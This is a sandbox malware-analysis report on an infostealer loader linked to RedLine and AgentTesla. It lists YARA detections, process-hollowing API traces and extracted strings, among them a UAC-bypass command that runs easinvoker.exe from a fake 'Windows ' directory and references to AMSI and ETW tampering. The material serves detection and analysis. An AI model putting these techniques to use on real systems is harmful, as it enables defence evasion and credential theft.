MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1918672427.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000001.1833365375.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1918672427.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000001.1833365375.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	21:32:17
Start date:	24/01/2024
Path:	C:\Users\Public\Libraries\Clmgncrs.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Clmgncrs.PIF"
Imagebase:	0x400000
File size:	1'693'184 bytes
MD5 hash:	39AD433C9BA920E7FD0961C66AC7079E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	21:32:20
Start date:	24/01/2024
Path:	C:\Users\Public\Libraries\srcngmlC.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\srcngmlC.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.2903058685.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000001.1903364195.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.2903058685.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000001.1903364195.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.2%
Total number of Nodes:	672
Total number of Limit Nodes:	38

Executed Functions

Function 02A2CA40 Relevance: 219.9, APIs: 12, Strings: 109, Instructions: 8183COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02A37AA9,?,?,?,000002BA,00000000,00000000), ref: 02A2CA75

Part of subcall function 029EFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD70
Part of subcall function 029EFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD7E
Part of subcall function 029EFD38: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029EFD97
Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB3
Part of subcall function 029EFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB9
Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE3
Part of subcall function 029EFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE9
Part of subcall function 029EFD38: FreeLibrary.KERNEL32(74AE0000,00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000), ref: 029EFDF4

Part of subcall function 029D8DE0: GetFileAttributesA.KERNEL32(00000000,?,02A2D4C6,ScanString,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,ScanString,02A6A350,02A37AE0,UacScan,02A6A350,02A37AE0,UacInitialize), ref: 029D8DEB

Part of subcall function 029DD570: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B5EB38,?,02A2D7E7,ScanBuffer,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,ScanBuffer,02A6A350,02A37AE0,OpenSession), ref: 029DD587

Part of subcall function 02A2B768: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A2B838), ref: 02A2B7A3
Part of subcall function 02A2B768: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A2B838), ref: 02A2B7D3
Part of subcall function 02A2B768: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A2B7E8
Part of subcall function 02A2B768: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A2B814
Part of subcall function 02A2B768: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A2B81D

Part of subcall function 029D8E04: GetFileAttributesA.KERNEL32(00000000,?,02A3062B,ScanString,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,ScanBuffer,02A6A350,02A37AE0,ScanString), ref: 029D8E0F

Part of subcall function 029D8FCC: CreateDirectoryA.KERNEL32(00000000,00000000,?,02A306D1,ScanBuffer,02A6A350,02A37AE0,ScanString,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0), ref: 029D8FD9

Part of subcall function 02A2B684: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A2B756), ref: 02A2B6C3
Part of subcall function 02A2B684: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A2B6FD
Part of subcall function 02A2B684: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A2B72A
Part of subcall function 02A2B684: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A2B733

Strings

C:\\Users\\Public\\Libraries\\, xrefs: 02A30E3B
EnumServicesStatusExA, xrefs: 02A369DE
RtlQueryProcessDebugInformation, xrefs: 02A369B1
Kernel32, xrefs: 02A36A10, 02A36A1F, 02A36A6A
DlpGetWebSiteAccess, xrefs: 02A36668
ScanString, xrefs: 02A2CC9E, 02A2CD77, 02A2CEFC, 02A2D08D, 02A2D316, 02A2D435, 02A2D9AA, 02A2EA26, 02A2EBC2, 02A2F07A, 02A2F121, 02A2F219, 02A2F43E, 02A2F764, 02A2F988, 02A2FA2D, 02A2FD72, 02A300AB, 02A302BB, 02A30599, 02A30B27, 02A30CD3, 02A30F90, 02A31451, 02A315C6, 02A3167E, 02A31CFF, 02A31F4C, 02A341F8, 02A3431F, 02A3442C, 02A34EC3, 02A352CF, 02A353E0, 02A357EB, 02A35D4F, 02A36228, 02A36336, 02A3671D, 02A36914, 02A36B78, 02A36E51, 02A3737F
CreateProcessW, xrefs: 02A36A1A
Ntdll, xrefs: 02A36989, 02A36998, 02A369A7, 02A369B6
Initialize, xrefs: 02A2CB0E, 02A2D8B2, 02A2DA35, 02A2DBEA, 02A2DD90, 02A2E045, 02A2EB46, 02A2EFFE, 02A2F2B8, 02A2F3C2, 02A2FAA9, 02A2FCE3, 02A2FF0B, 02A3023F, 02A306DD, 02A30D4F, 02A30F14, 02A34DCB, 02A355F0, 02A359E2, 02A364DD, 02A36D59, 02A37477
smartscreenps, xrefs: 02A2D11A, 02A2D14D, 02A2D180
BCryptRegisterProvider, xrefs: 02A2CFD8, 02A35883
VirtualAlloc, xrefs: 02A36BEE
^^Nc, xrefs: 02A2DEFE, 02A2EA9C
NtAlertResumeThread, xrefs: 02A36793
NtCreateSection, xrefs: 02A3705F
FlushInstructionCache, xrefs: 02A36CED
UacUninitialize, xrefs: 02A321BA
CryptSIPGetInfo, xrefs: 02A2CE5D
ntdll, xrefs: 02A359A8, 02A359BC, 02A367AA, 02A367DD, 02A36810, 02A36843, 02A36876, 02A36FAA, 02A36FDD, 02A37010, 02A37043, 02A37076, 02A370A9, 02A370DC, 02A3710F, 02A37142, 02A37175, 02A371A8, 02A371DB, 02A3720E, 02A37241, 02A37274, 02A375E9
[InternetShortcut], xrefs: 02A314C1
EnumServicesStatusExW, xrefs: 02A369ED
LdrLoadDll, xrefs: 02A3715E
mssip32, xrefs: 02A2CE74, 02A2CEA7, 02A2CEDA
FindCertsByIssuer, xrefs: 02A2CD47
C:\Users\Public\Libraries, xrefs: 02A2DA1F
cmd /c "C:\\Windows \\System32\\easinvoker.exe", xrefs: 02A34309
DllGetClassObject, xrefs: 02A2D103, 02A30753, 02A36EFA
NtQuerySystemInformation, xrefs: 02A36984
CryptSIPVerifyIndirectData, xrefs: 02A2CE90
GET, xrefs: 02A2F7DB
MZP, xrefs: 02A35FC7
VirtualProtect, xrefs: 02A36C54
NtDeviceIoControlFile, xrefs: 02A36993
EtwEventWriteEx, xrefs: 02A3722A
TrustOpenStores, xrefs: 02A2CCF9
NtOpenFile, xrefs: 02A371F7
WintrustAddActionID, xrefs: 02A2CD20
BCryptQueryProviderRegistration, xrefs: 02A2CFA5, 02A3586F
advapi32, xrefs: 02A35994
wintrust, xrefs: 02A2CD0A, 02A2CD31, 02A2CD58
NtQueryVirtualMemory, xrefs: 02A36FC6
NtMapViewOfSection, xrefs: 02A37092
kernel32, xrefs: 02A36C05, 02A36C38, 02A36C6B, 02A36C9E, 02A36CD1, 02A36D04, 02A36D37
EtwEventWrite, xrefs: 02A3725D
CryptSIPGetSignedDataMsg, xrefs: 02A2CEC3
WinHttp.WinHttpRequest.5.1, xrefs: 02A2F6C2
DlpCheckIsCloudSyncApp, xrefs: 02A36602
NtQueryInformationThread, xrefs: 02A36FF9
DlpNotifyPreDragDrop, xrefs: 02A365CF
NtWaitForSingleObject, xrefs: 02A367F9
@^@, xrefs: 02A2F0F0
HotKey=, xrefs: 02A31658
DllGetActivationFactory, xrefs: 02A2D136
http, xrefs: 02A2F4AE
endpointdlp, xrefs: 02A365E6, 02A36619, 02A3664C, 02A3667F
C:\Users\Public\, xrefs: 02A309D8, 02A3176A
spp, xrefs: 02A36EDE
WriteVirtualMemory, xrefs: 02A36CBA
ws2_32, xrefs: 02A36A5B
SLGatherMigrationBlob, xrefs: 02A36F2D
NtQuerySecurityObject, xrefs: 02A370F8
NtAccessCheck, xrefs: 02A3712B
NtGetWriteWatch, xrefs: 02A36F93
EnumServicesStatusW, xrefs: 02A369CF
C:\Windows\System32\, xrefs: 02A2D4B1, 02A345A2, 02A350DE
I_QueryTagInformation, xrefs: 02A3598F
CreateProcessA, xrefs: 02A36A0B
CreateProcessWithLogonW, xrefs: 02A36A47
LdrGetProcedureAddress, xrefs: 02A37191
sppc, xrefs: 02A36F44, 02A36F77
URL=file:", xrefs: 02A314D0
OpenSession, xrefs: 02A2CAAA, 02A2D3B9, 02A2D4DA, 02A2D5E7, 02A2D6EE, 02A2DAB1, 02A2DC66, 02A2DE0C, 02A2DFA8, 02A2E0C1, 02A2E235, 02A2E8FC, 02A2E9AA, 02A2EC5C, 02A2EE8A, 02A2EF82, 02A2F19D, 02A2F54D, 02A2F5D0, 02A2F6E8, 02A2F800, 02A2F90C, 02A2FB4F, 02A2FDEE, 02A2FF87, 02A30127, 02A303ED, 02A3051D, 02A30828, 02A30953, 02A30AAB, 02A30BDB, 02A30C57, 02A3100C, 02A31242, 02A313B6, 02A3154A, 02A316FA, 02A31B65, 02A31D7B, 02A31E23, 02A31FC8, 02A322D5, 02A34100, 02A3439B, 02A344A8, 02A34645, 02A3487B, 02A34920, 02A34BAB, 02A34D4F, 02A3504C, 02A35253, 02A35364, 02A35465, 02A3576F, 02A358A3, 02A35ADA, 02A35DCB, 02A35E59, 02A361AC, 02A363B2, 02A36461, 02A366A1, 02A36898, 02A36AFC, 02A36DD5, 02A373FB, 02A3756F
C:\Windows\SysWOW64, xrefs: 02A322AC
RtlCreateQueryDebugBuffer, xrefs: 02A3685F
DEEX, xrefs: 02A2CA83
.url, xrefs: 02A309E3
UacScan, xrefs: 02A2CC3A, 02A2D1A2, 02A2D29A, 02A2D836, 02A2E804, 02A2ED66, 02A2F64C, 02A2FC67, 02A30E98, 02A311C6, 02A31C5D, 02A32044, 02A32236, 02A32351, 02A3417C, 02A34524, 02A345C9, 02A34764, 02A34AB3, 02A34E47, 02A34F54, 02A35129, 02A35574, 02A356F3, 02A35A5E, 02A35B80, 02A35ED5, 02A35FF2, 02A362A4
UacInitialize, xrefs: 02A2CBD6, 02A2D21E, 02A2D92E, 02A30A2F, 02A34084, 02A34FD0, 02A35BFC, 02A36A80
NtReadVirtualMemory, xrefs: 02A370C5
psapi, xrefs: 02A36A01
.png, xrefs: 02A2DBA3, 02A2E2AB, 02A3729B, 02A372E1, 02A3732B, 02A37352
connect, xrefs: 02A36A56
C:\\Windows \\System32\\easinvoker.exe, xrefs: 02A3426E
RtlAllocateHeap, xrefs: 02A367C6, 02A3682C
NtOpenProcess, xrefs: 02A359B7, 02A375E4
NtOpenSection, xrefs: 02A3702C
iexpress.exe, xrefs: 02A2D6D8
sppwmi, xrefs: 02A36F11
IconIndex=, xrefs: 02A31524
DllRegisterServer, xrefs: 02A2D169
OpenProcess, xrefs: 02A36C87
DlpGetArchiveFileTraceInfo, xrefs: 02A36635
EnumServicesStatusA, xrefs: 02A369C0
BCryptVerifySignature, xrefs: 02A2CF72, 02A3585B, 02A36428
ScanBuffer, xrefs: 02A2CB72, 02A2CDE7, 02A2D011, 02A2D556, 02A2D663, 02A2D76A, 02A2DB2D, 02A2DCE2, 02A2DE88, 02A2DF2C, 02A2E13D, 02A2E1B9, 02A2E880, 02A2EACA, 02A2ECD8, 02A2EDE2, 02A2EF06, 02A2F334, 02A2F4D1, 02A2F87C, 02A2FBCB, 02A2FE8F, 02A30003, 02A301C3, 02A30371, 02A3063F, 02A307AC, 02A308D7, 02A30DCB, 02A31088, 02A3114A, 02A312BE, 02A3133A, 02A31BE1, 02A31E9F, 02A3213E, 02A34008, 02A34297, 02A346E8, 02A347FF, 02A3499C, 02A34A37, 02A34B2F, 02A351A5, 02A354E1, 02A3566C, 02A3591F, 02A35C78, 02A35F51, 02A3606E, 02A36130, 02A36559, 02A374F3
VirtualAllocEx, xrefs: 02A36C21
NtQueryDirectoryFile, xrefs: 02A369A2
SetUnhandledExceptionFilter, xrefs: 02A36D20
Advapi, xrefs: 02A369C5, 02A369D4, 02A369E3, 02A369F2, 02A36A2E, 02A36A3D, 02A36A4C
SLGetEncryptedPIDEx, xrefs: 02A36F60
NtWriteVirtualMemory, xrefs: 02A371C4
CreateProcessAsUserA, xrefs: 02A36A29
bcrypt, xrefs: 02A2CF89, 02A2CFBC, 02A2CFEF, 02A35860, 02A35874, 02A35888, 02A3643F
EnumProcessModules, xrefs: 02A369FC
CreateProcessAsUserW, xrefs: 02A36A38, 02A36A65
NtSetSecurityObject, xrefs: 02A359A3
acS, xrefs: 02A32425
can, xrefs: 02A32438
SxTracerGetThreadContextDebug, xrefs: 02A36EC7

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: File$Path$Name$AttributesCloseCreateCurrentLibraryMemoryModuleName_ProcessVirtualWrite$AddressDirectoryFreeHandleInetInformationLoadOfflineOpenProcProtectQueryRead
String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
API String ID: 2178617691-2902499223
Opcode ID: e029d27fd75ceca93a1a9a5d02f3bd55dd58020f10478a8f481bd35e78d07125
Instruction ID: 5f4168cca1ed6d57ab9ec93a0983bf504c8d3527a665a8a23c1cdcbedb67aec8
Opcode Fuzzy Hash: e029d27fd75ceca93a1a9a5d02f3bd55dd58020f10478a8f481bd35e78d07125
Instruction Fuzzy Hash: C2F34035A011189BDB15EB64DD80ADEB3BABFC4700F5094E6E509AB610DF30EF869F91

Uniqueness

Uniqueness Score: -1.00%

Function 029F7E4C Relevance: 43.5, APIs: 8, Strings: 16, Instructions: 1478
nativethreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 029EFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD70
Part of subcall function 029EFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD7E
Part of subcall function 029EFD38: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029EFD97
Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB3
Part of subcall function 029EFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB9
Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE3
Part of subcall function 029EFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE9
Part of subcall function 029EFD38: FreeLibrary.KERNEL32(74AE0000,00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000), ref: 029EFDF4

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A6A408,02A6A3F8,OpenSession,02A6A3D0,029F9710,ScanString,02A6A3D0), ref: 029F82D9
GetThreadContext.KERNEL32(00000884,02A6A44C,ScanString,02A6A3D0,029F9710,UacInitialize,02A6A3D0,029F9710,ScanBuffer,02A6A3D0,029F9710,ScanBuffer,02A6A3D0,029F9710,OpenSession,02A6A3D0), ref: 029F85CE
NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,0024CFF8,02A6A520,00000004,02A6A528,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan,02A6A3D0), ref: 029F882B
NtUnmapViewOfSection.N(0000088C,00400000,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,0000088C,0024CFF8,02A6A520,00000004,02A6A528), ref: 029F89A6

Part of subcall function 029EFB80: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 029EFB8D
Part of subcall function 029EFB80: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029EFB93
Part of subcall function 029EFB80: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029EFBB3

NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00400000,00000000,17D31400,02A6A528,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,ScanBuffer,02A6A3D0), ref: 029F8F89
